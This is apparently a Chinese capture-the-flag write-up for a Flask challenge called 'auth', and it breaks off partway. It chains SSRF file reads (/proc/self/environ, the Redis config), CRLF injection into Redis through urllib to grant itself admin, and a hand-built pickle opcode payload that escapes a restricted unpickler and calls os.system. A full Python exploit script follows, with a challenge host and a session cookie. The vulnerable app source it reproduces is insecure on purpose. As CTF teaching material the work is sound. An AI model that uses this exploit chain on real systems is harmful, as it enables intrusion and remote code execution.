auth

因为题目环境关了所以无法完整准确复现,以下是主要思路

首先注册一个账号,检查功能点发现/profile/avatar可以URL下载,使用file://协议可以读取本地文件

通过读取环境变量file:///proc/self/environ
可以得知工作目录在/app

读取源码: file:///app/app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
from flask import Flask, request, jsonify, render_template_string, session, redirect, url_for
import redis
import pickle
import requests
import base64
import os
import io
import datetime
import urllib.request
import urllib.error
import secrets
import json

app = Flask(__name__, static_folder='static', static_url_path='/static')

def render_page(title, content, username=None, role=None, show_nav=True):
"""生成带有样式的HTML页面

Args:
title: 页面标题
content: 主要内容HTML
username: 当前用户名(可选)
role: 用户角色(可选)
show_nav: 是否显示导航(默认True)
"""
# 导航菜单
nav_menu = ''
if show_nav:
if username:
nav_menu = f'''
<nav>
<ul>
<li><a href="/home">用户中心</a></li>
<li><a href="/profile">个人属性</a></li>
'''

if role == 'admin':
nav_menu += '''
<li><a href="/admin/online-users">在线用户</a></li>
<li><a href="/admin/users">注册用户</a></li>
'''

nav_menu += f'''
<li><a href="/logout">退出登录</a></li>
</ul>
</nav>
'''
else:
nav_menu = '''
<nav>
<ul>
<li><a href="/login">登录</a></li>
<li><a href="/register">注册</a></li>
</ul>
</nav>
'''

# 用户信息显示
user_info = ''
if username:
user_info = f'<div class="user-info">欢迎, {username}! (角色: {role})</div>'

html = f'''
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{title} - auth</title>
<link rel="stylesheet" href="/static/style.css">
<link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🔒</text></svg>">
</head>
<body>
<div class="container">
<header>
<h1>{title}</h1>
{user_info}
</header>

{nav_menu}

<main>
{content}
</main>

<footer>
<p>© 2026 auth | 简约安全设计</p>
</footer>
</div>

<script src="/static/script.js"></script>
</body>
</html>
'''
return html

class User:
def __init__(self, username, password=None):
self.username = username
self.password = password
self.role = "user"
self.created_at = "2026-01-20"

def __repr__(self):
return f"User(username={self.username!r}, role={self.role!r})"


class OnlineUser:
"""在线用户类,用于保存登录状态信息"""
def __init__(self, username, role="user"):
self.username = username
self.role = role
self.login_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# 设置失效时间为登录时间后1小时
expiry = datetime.datetime.now() + datetime.timedelta(hours=1)
self.expiry_time = expiry.strftime("%Y-%m-%d %H:%M:%S")
self.ip_address = request.remote_addr if request else "unknown"

def __repr__(self):
return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"


class RestrictedUnpickler(pickle.Unpickler):
"""限制性的Unpickler,只允许OnlineUser类和安全的内置函数"""

ALLOWED_CLASSES = {
'__main__.OnlineUser': OnlineUser,
'builtins': __builtins__
}

def find_class(self, module: str, name: str):
full_name = f"{module}.{name}"

# 允许builtins模块的基础类型和安全函数
if module == "builtins" and name in ["getattr", "setattr", "dict", "list", "tuple"]:
return getattr(__builtins__, name)

# 白名单检查
if full_name in self.ALLOWED_CLASSES:
return self.ALLOWED_CLASSES[full_name]

raise pickle.UnpicklingError(f"Class '{full_name}' is not allowed")


# Redis配置
CONFIG_FILE_PATH = '/opt/app_config/redis_config.json'

# 默认配置值
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_PASSWORD = '123456'

# 尝试从配置文件读取配置
try:
if os.path.exists(CONFIG_FILE_PATH):
print(f"从配置文件读取Redis配置: {CONFIG_FILE_PATH}")
with open(CONFIG_FILE_PATH, 'r') as config_file:
config = json.load(config_file)

# 从配置文件获取配置值,如果不存在则使用默认值
REDIS_HOST = config.get('redis_host', REDIS_HOST)
REDIS_PORT = config.get('redis_port', REDIS_PORT)
REDIS_PASSWORD = config.get('redis_password', REDIS_PASSWORD)

print(f"配置文件读取成功: host={REDIS_HOST}, port={REDIS_PORT}")

try:
os.remove(CONFIG_FILE_PATH)
print(f"配置文件已删除: {CONFIG_FILE_PATH}")
except Exception as delete_error:
print(f"警告:无法删除配置文件 {CONFIG_FILE_PATH}: {delete_error}")
else:
print(f"配置文件不存在: {CONFIG_FILE_PATH},使用默认Redis配置")
except Exception as config_error:
print(f"配置文件读取失败: {config_error},使用默认Redis配置")

# 连接Redis
try:
r = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, decode_responses=False)
r.ping()
print(f"Redis连接成功: {REDIS_HOST}:{REDIS_PORT}")

# 从Redis获取或生成随机secret_key
SECRET_KEY_REDIS_KEY = 'app:secret_key'
secret_key = r.get(SECRET_KEY_REDIS_KEY)
if secret_key is None:
# 生成新的随机密钥(64个字符的十六进制字符串)
secret_key = secrets.token_hex(32)
r.set(SECRET_KEY_REDIS_KEY, secret_key)
print(f"已生成新的随机secret_key并保存到Redis: {SECRET_KEY_REDIS_KEY}")
else:
# Redis返回的是bytes,需要解码为字符串
if isinstance(secret_key, bytes):
secret_key = secret_key.decode('utf-8')
print(f"从Redis加载现有的secret_key: {SECRET_KEY_REDIS_KEY}")

# 设置Flask应用的secret_key
app.secret_key = secret_key
print(f"Flask secret_key已设置(长度: {len(secret_key)})")

except Exception as e:
print(f"Redis连接失败: {e}")
r = None


@app.route('/')
def index():
return redirect(url_for('login'))


@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form.get('username', '')
password = request.form.get('password', '')

if not username or not password:
return '用户名和密码不能为空'

# 检查用户是否存在
if r is None:
return 'Redis连接失败,无法验证用户'

# 从Redis获取用户密码哈希
stored_password = r.hget(f'user:{username}', 'password')
if stored_password is None:
return '用户不存在或密码错误'

# 简单密码验证
if stored_password.decode('utf-8') != password:
return '用户不存在或密码错误'

# 登录成功,设置session
session['username'] = username
session['logged_in'] = True

# 获取用户角色
role_data = r.hget(f'user:{username}', 'role')
role = role_data.decode('utf-8') if role_data else 'user'
session['role'] = role

online_user = OnlineUser(username, role)
serialized_user = pickle.dumps(online_user)
r.set(f'online_user:{username}', serialized_user, ex=3600) # 设置1小时过期

return redirect(url_for('home'))

login_form = '''
<div class="form-container">
<h2>用户登录</h2>
<form method="post" class="login-form">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>
<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">登录</button>
</div>
</form>
<div class="text-center mt-20">
<p>还没有账号? <a href="/register" class="btn btn-secondary btn-small">注册新账户</a></p>
</div>
</div>
'''

return render_page('登录', login_form, show_nav=False)


# 用户注册
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form.get('username', '')
password = request.form.get('password', '')
confirm_password = request.form.get('confirm_password', '')
name = request.form.get('name', '')
age = request.form.get('age', '')
phone = request.form.get('phone', '')

if not username or not password:
return '用户名和密码不能为空'

if password != confirm_password:
return '两次输入的密码不一致'

if r is None:
return 'Redis连接失败,无法注册用户'

# 检查用户是否已存在
if r.hexists(f'user:{username}', 'password'):
return '用户名已存在'

user_data = {
'password': password,
'role': 'user',
'created_at': '2026-01-20',
'name': name if name else username, # 如果未提供姓名,默认使用用户名
'age': age if age else '0',
'phone': phone if phone else '未填写',
'avatar': '' # 默认头像为空
}

r.hset(f'user:{username}', mapping=user_data)

success_content = f'''
<div class="message message-success">
<h3>注册成功!</h3>
<p>用户 <strong>{username}</strong> 已成功注册。</p>
<p><a href="/login" class="btn btn-success mt-10">前往登录</a></p>
</div>
'''
return render_page('注册成功', success_content, show_nav=False)

register_form = '''
<div class="form-container">
<h2>用户注册</h2>
<form method="post" class="register-form">
<div class="form-group">
<label for="username">用户名 <span class="required">*</span></label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>

<div class="form-group">
<label for="password">密码 <span class="required">*</span></label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>

<div class="form-group">
<label for="confirm_password">确认密码 <span class="required">*</span></label>
<input type="password" id="confirm_password" name="confirm_password" required placeholder="请再次输入密码">
</div>

<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" placeholder="可选,默认为用户名">
</div>

<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" min="0" max="150" placeholder="可选">
</div>

<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" placeholder="可选">
</div>

<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">注册</button>
</div>
</form>

<div class="text-center mt-20">
<p>已有账号? <a href="/login" class="btn btn-secondary btn-small">返回登录</a></p>
</div>
</div>
'''

return render_page('注册', register_form, show_nav=False)


@app.route('/home')
def home():
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '访客')
role = session.get('role', 'user')

admin_link = ''
if role == 'admin':
admin_link = '<li><a href="/admin/online-users">管理在线用户</a> - 查看所有在线用户信息</li>\n <li><a href="/admin/users">管理注册用户</a> - 查看所有注册用户信息</li>'

main_content = f'''
<div class="dashboard">
<div class="welcome-message">
<h2>欢迎回来,{username}!</h2>
<p class="role-badge">角色: <span class="badge">{role}</span></p>
</div>

<div class="dashboard-cards">
<div class="card">
<h3>个人信息</h3>
<p>查看和编辑您的个人资料,包括头像上传</p>
<a href="/profile" class="btn btn-success mt-10">管理个人信息</a>
</div>
'''

if role == 'admin':
main_content += '''
<div class="card">
<h3>用户管理</h3>
<p>管理系统中的用户</p>
<div class="flex flex-column gap-10 mt-10">
<a href="/admin/online-users" class="btn btn-small">在线用户</a>
<a href="/admin/users" class="btn btn-small">注册用户</a>
</div>
</div>
'''

main_content += '''
</div>

<div class="quick-actions mt-30">
<h3>快速操作</h3>
<div class="flex gap-10">
<a href="/logout" class="btn btn-danger">退出登录</a>
</div>
</div>
</div>
'''

return render_page('用户中心', main_content, username, role)


@app.route('/admin/online-users')
def admin_online_users():
if not session.get('logged_in'):
return redirect(url_for('login'))

if session.get('role') != 'admin':
return '权限不足,需要管理员权限'

if r is None:
return 'Redis连接失败'

# 获取所有在线用户键
online_keys = r.keys('online_user:*')

if not online_keys:
return '没有在线用户'

users_html = '<h1>在线用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
users_html += '<tr><th>用户名</th><th>角色</th><th>登录时间</th><th>失效时间</th><th>IP地址</th><th>状态</th></tr>'

for key in online_keys:
try:
serialized = r.get(key)
if serialized:
file = io.BytesIO(serialized)
unpickler = RestrictedUnpickler(file)
online_user = unpickler.load()

expiry_time = datetime.datetime.strptime(online_user.expiry_time, "%Y-%m-%d %H:%M:%S")
current_time = datetime.datetime.now()
status = '在线' if current_time < expiry_time else '已过期'

users_html += f'''
<tr>
<td>{online_user.username}</td>
<td>{online_user.role}</td>
<td>{online_user.login_time}</td>
<td>{online_user.expiry_time}</td>
<td>{online_user.ip_address}</td>
<td style="color: {'green' if status == '在线' else 'red'}">{status}</td>
</tr>
'''
except Exception as e:
users_html += f'<tr><td colspan="6">反序列化错误: {e}</td></tr>'

users_html += '</table>'

# 获取当前用户信息用于render_page
current_username = session.get('username', '')
current_role = session.get('role', '')

users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/users" class="btn btn-secondary">查看注册用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''

return render_page('在线用户管理', users_html, current_username, current_role)


@app.route('/admin/users')
def admin_users():
if not session.get('logged_in'):
return redirect(url_for('login'))

if session.get('role') != 'admin':
return '权限不足,需要管理员权限'

if r is None:
return 'Redis连接失败'

# 获取所有用户键
user_keys = r.keys('user:*')

if not user_keys:
return '没有注册用户'

users_html = '<h1>注册用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
users_html += '<tr><th>用户名</th><th>角色</th><th>姓名</th><th>年龄</th><th>手机号码</th><th>创建时间</th></tr>'

for key in user_keys:
try:
user_data = r.hgetall(key)
if user_data:
user_info = {}
for field, value in user_data.items():
field_str = field.decode('utf-8') if isinstance(field, bytes) else field
value_str = value.decode('utf-8') if isinstance(value, bytes) else value
user_info[field_str] = value_str

username = key.decode('utf-8').replace('user:', '') if isinstance(key, bytes) else key.replace('user:', '')
role = user_info.get('role', 'user')
name = user_info.get('name', username)
age = user_info.get('age', '0')
phone = user_info.get('phone', '未填写')
created_at = user_info.get('created_at', '未知')

users_html += f'''
<tr>
<td>{username}</td>
<td>{role}</td>
<td>{name}</td>
<td>{age}</td>
<td>{phone}</td>
<td>{created_at}</td>
</tr>
'''
except Exception as e:
users_html += f'<tr><td colspan="6">获取用户信息错误: {e}</td></tr>'

users_html += '</table>'

current_username = session.get('username', '')
current_role = session.get('role', '')

users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/online-users" class="btn btn-secondary">查看在线用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''

return render_page('注册用户管理', users_html, current_username, current_role)


@app.route('/profile')
def profile():
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'

# 从Redis获取用户信息
user_data = r.hgetall(f'user:{username}')
if not user_data:
return '用户信息不存在'

user_info = {}
for key, value in user_data.items():
user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \
value.decode('utf-8') if isinstance(value, bytes) else value

name = user_info.get('name', username)
age = user_info.get('age', '0')
phone = user_info.get('phone', '未填写')
avatar = user_info.get('avatar', '')
role = user_info.get('role', 'user')
created_at = user_info.get('created_at', '未知')

# 判断头像类型:URL或本地文件
if avatar.startswith('http://') or avatar.startswith('https://'):
avatar_src = avatar
else:
avatar_src = ''

# 构建个人资料内容
profile_content = f'''
<div class="profile-container">
<div class="profile-header">
<h2>个人资料</h2>
<p>查看和管理您的个人信息</p>
</div>

<div class="profile-content">
<div class="profile-avatar-section">
<div class="avatar-preview">
<img src="{avatar_src}" alt="用户头像" id="profile-avatar">
</div>
<div class="avatar-actions">
<a href="/profile/avatar" class="btn btn-success">更换头像</a>
</div>
</div>

<div class="profile-info-section">
<h3>基本信息</h3>
<table class="profile-info-table">
<tr>
<th>用户名</th>
<td>{username}</td>
</tr>
<tr>
<th>姓名</th>
<td>{name}</td>
</tr>
<tr>
<th>年龄</th>
<td>{age}</td>
</tr>
<tr>
<th>手机号码</th>
<td>{phone}</td>
</tr>
<tr>
<th>角色</th>
<td><span class="badge">{role}</span></td>
</tr>
<tr>
<th>注册时间</th>
<td>{created_at}</td>
</tr>
</table>

<div class="profile-actions mt-30">
<a href="/profile/edit" class="btn btn-success">编辑个人资料</a>
<a href="/home" class="btn btn-secondary">返回用户中心</a>
</div>
</div>
</div>
</div>
'''

return render_page('个人属性', profile_content, username, role)


# 编辑个人属性
@app.route('/profile/edit', methods=['GET', 'POST'])
def edit_profile():
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'

if request.method == 'POST':
# 获取表单数据
name = request.form.get('name', '')
age = request.form.get('age', '')
phone = request.form.get('phone', '')

# 验证年龄是否为数字
if age and not age.isdigit():
return '年龄必须是数字'

# 获取当前用户信息
current_data = r.hgetall(f'user:{username}')
if not current_data:
return '用户信息不存在'

# 更新用户信息(保留密码和角色等字段)
updates = {}
if name:
updates['name'] = name
if age:
updates['age'] = age
if phone:
updates['phone'] = phone

# 只更新有变化的字段
if updates:
r.hset(f'user:{username}', mapping=updates)

return redirect(url_for('profile'))

# GET请求,显示编辑表单
# 获取当前用户信息
user_data = r.hgetall(f'user:{username}')
if not user_data:
return '用户信息不存在'

# 解码字节数据为字符串
user_info = {}
for key, value in user_data.items():
user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \
value.decode('utf-8') if isinstance(value, bytes) else value

# 获取当前值
current_name = user_info.get('name', username)
current_age = user_info.get('age', '0')
current_phone = user_info.get('phone', '未填写')

# 构建编辑表单
edit_form = f'''
<div class="form-container">
<h2>编辑个人资料</h2>
<p>更新您的个人信息</p>

<form method="post" class="edit-form">
<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" value="{current_name}" placeholder="请输入您的姓名">
</div>

<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" value="{current_age}" min="0" max="150" placeholder="请输入您的年龄">
</div>

<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" value="{current_phone}" placeholder="请输入您的手机号码">
</div>

<div class="form-group">
<button type="submit" class="btn btn-success">保存修改</button>
<a href="/profile" class="btn btn-secondary" style="margin-left: 15px;">取消</a>
</div>
</form>

<div class="additional-actions mt-30">
<h3>其他操作</h3>
<div class="flex gap-10">
<a href="/profile/avatar" class="btn btn-small">更换头像</a>
<a href="/profile" class="btn btn-small">返回个人资料</a>
<a href="/home" class="btn btn-small">返回用户中心</a>
</div>
</div>
</div>
'''

return render_page('编辑个人属性', edit_form, username, session.get('role', 'user'))


# 退出登录
@app.route('/logout')
def logout():
session.clear()
return redirect(url_for('login'))


# 用户头像上传
@app.route('/profile/avatar', methods=['GET', 'POST'])
def upload_avatar():
# 检查用户是否登录
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'

if request.method == 'GET':
# 显示上传表单
upload_form = f'''
<div class="upload-container">
<h2>上传头像</h2>
<div class="user-info mb-20">
<p><strong>当前用户:</strong> {username}</p>
</div>

<div class="upload-options">
<div class="upload-option">
<h3>方式一:上传图片文件</h3>
<div class="upload-form-card">
<form method="post" enctype="multipart/form-data" class="upload-form">
<div class="form-group">
<label for="avatar_file">选择图片文件</label>
<input type="file" id="avatar_file" name="avatar_file" accept="image/*" class="file-input">
<p class="help-text">支持 JPG, PNG, GIF 等图片格式</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="上传文件" class="btn btn-success">上传文件</button>
</div>
</form>
</div>
</div>

<div class="upload-option">
<h3>方式二:提供图片URL</h3>
<div class="upload-form-card">
<form method="post" class="upload-form">
<div class="form-group">
<label for="avatar_url">图片URL地址</label>
<input type="text" id="avatar_url" name="avatar_url" placeholder="请输入图片URL地址" class="url-input">
<p class="help-text">请输入有效的图片URL地址</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="从URL下载" class="btn btn-success">从URL下载</button>
</div>
</form>
</div>
</div>
</div>

<div class="upload-note mt-30">
<div class="message">
<p><strong>注意:</strong>上传的头像将显示在您的个人资料中。</p>
</div>
</div>

<div class="upload-actions mt-30">
<a href="/profile" class="btn btn-secondary">返回个人属性</a>
</div>
</div>
'''

return render_page('上传头像', upload_form, username, session.get('role', 'user'))

# POST请求处理
upload_type = request.form.get('upload_type')

if upload_type == '上传文件':
# 处理文件上传
if 'avatar_file' not in request.files:
return '请选择要上传的文件'

file = request.files['avatar_file']
if file.filename == '':
return '请选择有效的文件'

# 检查文件类型
if file.content_type and not file.content_type.startswith('image/'):
return '只能上传图片文件'

return '功能尚未开发'

elif upload_type == '从URL下载':
url = request.form.get('avatar_url', '')
if not url:
return '请提供图片URL'

try:
# 使用urllib处理URL请求
import urllib.parse

# 解析URL获取主机和端口信息
parsed = urllib.parse.urlparse(url)
host = parsed.hostname
port = parsed.port or (80 if parsed.scheme == 'http' else 443 if parsed.scheme == 'https' else None)

# 使用urllib.request.urlopen发送请求
req = urllib.request.Request(url)

# 发送请求并获取响应
response = urllib.request.urlopen(req, timeout=10)
response_data = response.read()
content_type = response.headers.get('Content-Type', '')
status_code = response.getcode()

r.hset(f'user:{username}', 'avatar', url)
data_size = len(response_data)

base64_data = base64.b64encode(response_data).decode('utf-8')

# 创建base64图片数据URI
# 如果content_type为空或无效,使用默认的image/png
display_content_type = content_type if content_type else 'image/png'
data_uri = f'data:{display_content_type};base64,{base64_data}'

# 统一显示结果,使用img标签展示base64编码的图片数据
unified_content = f'''
<div class="message">
<h2>图片预览</h2>

<div class="image-preview-container mt-20">
<div class="image-wrapper">
<img src="{data_uri}" alt="加载图片图片" style="max-width: 100%; max-height: 500px; border: 1px solid #ddd; border-radius: 4px;">
</div>
</div>

<div class="preview-actions mt-30">
<a href="/profile" class="btn btn-success">查看个人属性</a>
<a href="/profile/avatar" class="btn btn-secondary">继续上传</a>
</div>
</div>
'''

return render_page('图片预览', unified_content, username, session.get('role', 'user'))

except Exception as e:
error_content = f'''
<div class="message message-error">
<h2>处理失败</h2>
<div class="error-details">
<p><strong>错误信息:</strong> {e}</p>
</div>
<div class="error-actions mt-20">
<a href="/profile/avatar" class="btn btn-secondary">返回上传页面</a>
</div>
</div>
'''

return render_page('处理失败', error_content, username, session.get('role', 'user'))

else:
return '无效的上传类型'



if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=False)

简单审计发现/admin/online-users存在受限的pickle反序列化可能,但是需要admin账号,并且需要主动向redisonline_user:test主动写入pickle序列化字符串。

同时根据源码,很明显远程服务器应当存在redis服务,但是REDIS_SERVERREDIS_PORTREDIS_PASSWORD可能并非默认值

起初以为密码就是123456试了半天

通过读取redis配置信息可以得到密码: file:///etc/redis/redis.conf

当我们的url为http://127.0.0.1:6379时,会发现报错-ERR wrong number of arguments for 'get' command,说明redis确实开放在本地6379端口

urllib.request.urlopen本身不支持dict://gopher://协议,因此无法直接与redis进行交互

观察响应包可以看出Python版本为3.7.3
而在Python2.x版本至2.7.16版本中的urllib2和Python3.x版本至3.7.2版本中的urllib存在注入漏洞,可以进行请求走私,经过测试,本题的3.7.3也存在漏洞CVE-2019-9740

基础请求url为:
http://127.0.0.1:6379/\r\npayload\r\n

根据源码,我们不太好直接获取app:secret_key,所以这里选择直接仿照源码中的格式,HSET我的用户为管理员即可,需要执行redis命令:

1
2
3
AUTH redispass123
HSET user:BR role admin
QUIT

对应Payload:
http://127.0.0.1:6379/\r\nAUTH redispass123\r\nHSET user:BR role admin\r\nQUIT\r\n

然后退出重新登录,拿到的就是管理员session

接下来需要打pickle反序列化,存在白名单WAF:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ALLOWED_CLASSES = {
'__main__.OnlineUser': OnlineUser,
'builtins': __builtins__
}

def find_class(self, module: str, name: str):
full_name = f"{module}.{name}"

# 允许builtins模块的基础类型和安全函数
if module == "builtins" and name in ["getattr", "setattr", "dict", "list", "tuple"]:
return getattr(__builtins__, name)

# 白名单检查
if full_name in self.ALLOWED_CLASSES:
return self.ALLOWED_CLASSES[full_name]

raise pickle.UnpicklingError(f"Class '{full_name}' is not allowed")

常规Payload用不了,需要自行构造opcode
经过本地测试,我们可以从OnlineUser出发,逐步取到os.system

1
OnlineUser.__init__.__globals__["os"].system("whoami")

也等价于

1
getattr(dict.get(getattr(getattr(OnlineUser, "__init__"), "__globals__"), "os"),"system")("whoami")

其中getattrdict都为白名单可以利用
这里利用pker工具EddieIvan01/pker: Automatically converts Python source code to Pickle opcode编写Payload,回显写入静态目录方便读取

1
2
3
4
5
6
7
8
9
getattr = GLOBAL('builtins', 'getattr')
dict_ = GLOBAL('builtins', 'dict')
dict_get = getattr(dict_, "get")
user = GLOBAL("__main__", "OnlineUser")
init = getattr(user, "__init__")
global_ = getattr(init, "__globals__")
os = dict_get(global_, "os")
getattr(os, "system")("whoami > /app/static/3.txt")
return

得到payload:

1
b"cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS'get'\ntRp2\n0c__main__\nOnlineUser\np3\n0g0\n(g3\nS'__init__'\ntRp4\n0g0\n(g4\nS'__globals__'\ntRp5\n0g2\n(g5\nS'os'\ntRp6\n0g0\n(g6\nS'system'\ntR(S'whoami > /app/static/1.txt'\ntR."

使用SET写入到online_user:test

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
from bs4 import BeautifulSoup
import base64
import urllib.parse

exp = """cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS'get'\ntRp2\n0c__main__\nOnlineUser\np3\n0g0\n(g3\nS'__init__'\ntRp4\n0g0\n(g4\nS'__globals__'\ntRp5\n0g2\n(g5\nS'os'\ntRp6\n0g0\n(g6\nS'system'\ntR(S'whoami > /app/static/1.txt'\ntR.""".replace("\n", "\\n")

# print(exp)

payload = f"""http://127.0.0.1:6379/\r\nAUTH redispass123\r\nSET online_user:test "{exp}"\r\nQUIT\r\n"""

url = "http://85b7a82a-5c4a-436a-b9b1-d6be4c2b150e.70.dart.ccsssc.com/"

post_data = {
"avatar_url": payload,
"upload_type": "从URL下载"
}

headers = {
"cookie": "session=eyJsb2dnZWRfaW4iOnRydWUsInJvbGUiOiJ1c2VyIiwidXNlcm5hbWUiOiJCUiJ9.abURmg.V2KgptKdMne5v0bKjxXjilJRrFA"
}

res = requests.post(url+"/profile/avatar", data=post_data, headers=headers)


bp = BeautifulSoup(res.text, 'html.parser')
div = bp.find("div", class_="image-wrapper")
b64_data = str(div).split(";base64,")[-1].split("\" style")[0]

try:
data = base64.b64decode(b64_data).decode("utf-8")
print(data)
except Exception as e:
print(res.text)

即使写入成功也会显示NOAUTH,不过没啥影响,访问/admin/online-users发现有报错说明正确写入并触发了,触发payload后访问/static/1.txt可以获取回显

同样的,执行ls /可以找到/flag,但是权限是400且所属组为root,这意味着需要提权,尝试寻找进程、计划任务、suid等可以利用提权的东西

在执行ps aux发现一个特别的进程,它是root权限运行的

读取源码:file:///opt/mcp_service/mcp_server_secure_e938a2d234b7968a885bbbbb63cde7b9.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
